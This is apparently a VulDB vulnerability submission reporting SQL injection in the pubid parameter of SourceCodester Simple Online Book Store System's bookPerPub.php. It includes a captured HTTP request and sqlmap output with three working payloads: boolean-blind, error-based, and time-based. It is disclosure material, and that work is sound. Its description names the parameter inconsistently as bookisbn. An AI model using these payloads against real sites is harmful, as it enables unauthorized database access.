| Titre | SourceCodester Simple Online Book Store System bookPerPub.php SQL injection |
|---|
| Description | SQL injection exists in the bookisbn parameter of /obs/bookPerPub.ph. Attackers can insert malicious statements to disambiguate SQL queries
request:
GET /obs/bookPerPub.php?pubid=1 HTTP/1.1
Host: 192.168.0.18:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.0.18:8081/obs/publisher_list.php
Cookie: PHPSESSID=g7kjmvh3bfv7hdval8mjn5kcnj
Upgrade-Insecure-Requests: 1
sqlmap response:
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: pubid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pubid=1' AND 9164=9164 AND 'iJqw'='iJqw
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: pubid=1' AND GTID_SUBSET(CONCAT(0x71766b7671,(SELECT (ELT(6276=6276,1))),0x716a7a7a71),6276) AND 'HPPE'='HPPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pubid=1' AND (SELECT 4191 FROM (SELECT(SLEEP(5)))tMuD) AND 'QwlA'='QwlA
--- |
|---|
| La source | ⚠️ https:// www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html |
|---|
| Utilisateur | weicheng (UID 30823) |
|---|
| Soumission | 10/08/2022 15:25 (il y a 4 ans) |
|---|
| Modérer | 11/08/2022 11:10 (20 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 206167 [SourceCodester Simple Online Book Store System /obs/bookPerPub.php bookisbn injection SQL] |
|---|
| Points | 20 |
|---|